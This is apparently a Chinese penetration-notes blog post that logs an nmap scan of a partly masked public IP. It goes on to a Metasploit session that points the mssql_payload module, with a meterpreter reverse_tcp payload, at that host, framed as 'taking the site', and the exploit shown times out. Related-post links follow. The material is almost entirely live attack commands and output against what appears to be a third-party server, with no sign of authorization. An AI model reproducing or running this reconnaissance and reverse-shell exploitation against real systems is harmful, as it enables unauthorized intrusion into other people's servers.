扫描一下

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间

NSE: Loaded 49 scripts for scanning.

Initiating Ping Scan at 09:36

Scanning 203.171.239.* [4 ports]

Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 09:36

Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed

Initiating SYN Stealth Scan at 09:36

Scanning 203.171.239.* [1000 ports]

Discovered open port 3389/tcp on 203.171.239.*

Discovered open port 80/tcp on 203.171.239.*

Discovered open port 3306/tcp on 203.171.239.*

Discovered open port 21/tcp on 203.171.239.*

Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)

Initiating Service scan at 09:36

Scanning 4 services on 203.171.239.*

Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)

Initiating OS detection (try #1) against 203.171.239.*

Retrying OS detection (try #2) against 203.171.239.*

Initiating Traceroute at 09:37

Completed Traceroute at 09:37, 0.06s elapsed

Initiating Parallel DNS resolution of 1 host. at 09:37

Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed

NSE: Script scanning 203.171.239.*.

NSE: Starting runlevel 1 (of 1) scan.

Initiating NSE at 09:37

Completed NSE at 09:37, 5.22s elapsed

NSE: Script Scanning completed.

Nmap scan report for 203.171.239.*

Host is up (0.043s latency).

Not shown: 994 filtered ports

PORT STATE SERVICE VERSION

21/tcp open ftp Microsoft ftpd

25/tcp closed smtp

80/tcp open http Microsoft IIS httpd

|_http-methods: No Allow or Public header in OPTIONS response (status code 400)

|_html-title: Site doesn't have a title (text/html).

110/tcp closed pop3

3306/tcp open mysql MySQL 5.1.32-community

| mysql-info: Protocol: 10

| Version: 5.1.32-community

| Thread ID: 30457

| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection

| Status: Autocommit

|_Salt: <*[k+0O~O" target=_blank>B@Y";By^J5k<*[k+0O~O

3389/tcp open microsoft-rdp Microsoft Terminal Service

Device type: general purpose|media device

Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)

Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=262 (Good luck!)

IP ID Sequence Generation: Busy server or unknown class

Service Info: OS: Windows

TRACEROUTE (using port 25/tcp)

HOP RTT ADDRESS

1 50.00 ms 203.171.239.*

Read data files from: D:\metasploit\Nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds

Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)

开始拿站

Welcome to the Metasploit Web Console!

_ _

_ | | (_)_

____ ____| |_ ____ ___ ____ | | ___ _| |_

| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)

| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__

|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)

|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 296 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 296 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/mssql/mssql_payload

>> info windows/mssql/mssql_payload

Name: Microsoft SQL Server Payload Execution

Version: 9669

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

David Kennedy "ReL1K" <kennedyd013@gmail.com>

jduck <jduck@metasploit.com>

Available targets:

Id Name

-- ----

0 Automatic

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload information:

Description:

This module will execute an arbitrary payload on a Microsoft SQL

Server, using the Windows debug.com method for writing an executable

to disk and the xp_cmdshell stored procedure. File size restrictions

are avoided by incorporating the debug bypass method presented at

Defcon 17 by SecureState. Note that this module will leave a

metasploit payload in the Windows System32 directory which must be

manually deleted once the attack is completed.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402

http://www.osvdb.org/557

http://www.securityfocus.com/bid/1281

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209

http://www.osvdb.org/15757

http://www.securityfocus.com/bid/4797

http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

>> use windows/mssql/mssql_payload

>> set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

>> set RHOST 203.171.239.*

RHOST => 203.171.239.*

>> set LHOST 172.16.2.101

LHOST => 172.16.2.101

>> exploit

[*] Started reverse handler on 172.16.2.101:4444

[-] Exploit failed: The connection timed out (203.171.239.*:1433).

[*] Exploit completed, but no session was created.

渗透杂记-2013-07-13 windows/mssql/mssql_payload的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

    http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

  3. SharePoint 2013中修改windows 活动目录(AD)域用户密码的WebPart(免费下载)

    前段时间工作很忙,好久没更新博客了,趁国庆休假期间,整理了两个之前积累很实用的企业集成组件,并在真正的大型项目中经受住了考验:.Net版SAP RFC适配器组件和SharePoint 2013修改AD ...

  4. http://www.ruanyifeng.com/blog/2013/07/gpg.html

    http://www.ruanyifeng.com/blog/2013/07/gpg.html

  5. 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

    http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

  6. <2013 07 31> 没有必然的理由

    <2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...

  7. 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

    Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...

  8. 小白日记17:kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    缓冲区溢出实例 缓冲区溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 空间存储了用户程序的函数栈帧 ...

  9. SAP ERP 6.0 EHP7 SR2(WINDOWS MSSQL版)安装说明

    原文 by 枫竹丹青 ⋅ 1.安装准备 1.1.版本说明 本文是描述在一个Windows虚拟机.SQL Server数据库环境下,安装SAP ERP 6.0 EHP7 SR2服务器,安装完成虚拟机文件 ...

随机推荐

  1. C# 接口笔记

    /* 1. 实现多态的两种方式.             *    使用虚方法实现多态.             *    使用抽象方法实现多态.             *              ...

  2. 简单的oracle分页语句

    SELECT * FROM ( SELECT rownum rn,te.* FROM (SELECT * FROM  tb_enterprise) te  WHERE rownum <= 10) ...

  3. Python学习【第三篇】Python变量

    变量 声明变量 #!/usr/bin/env python name = "Bourbon" 上述代码声明了一个变量,变量名为:name,变量的值为:"Bourbon&q ...

  4. mysql 主从

    1.首先 主库创建二进制数据访问账户(账户:repl 密码:repl@01) GRANT REPLICATION SLAVE, REPLICATION CLIENT ON *.* to repl@'% ...

  5. vim - mark

    Using markshttp://vim.wikia.com/wiki/Using_marks1. There is no visible indication of where marks are ...

  6. jNotify:操作结果信息提示条

    我们在提交表单后,通过Ajax响应后台返回结果,并在前台显示返回信息,jNotify能非常优雅的显示操作结果信息.jNotify是一款基于jQuery的信息提示插件,它支持操作成功.操作失败和操作提醒 ...

  7. 基于Java Mina 通信框架的JT/T809转发服务器设计

    Apache MINA 是 Apache 组织的一个开源项目,为开发高性能和高可用性的网络应用程序提供了非常便利的框架. 也是Java开发者的一个福利(.NET目前还没有类似封装的这么好的基础sock ...

  8. 暑假CTF训练一

    暑假CTF训练一 围在栅栏中的爱 题目: 最近一直在好奇一个问题,QWE到底等不等于ABC? -.- .. --.- .-.. .-- - ..-. -.-. --.- --. -. ... --- ...

  9. memcached SASLAUTH 启动

    1.环境描述: Linux 服务器,memcached1.4.5 登录linux的用户名tuxedo,密码tuxedo 2.启动memcached sasl认证 p.p1 { margin: 0.0p ...

  10. Visual Studio配色方案

    Eclipse开源工具和VS在诸多方面真的是差距非常大,无奈Java编程,使用VS非常麻烦.所以只能选择Eclipse 但是Eclipse的系统配色,又实在是不舒服,于是抽时间,从VS上抠了一份默认的 ...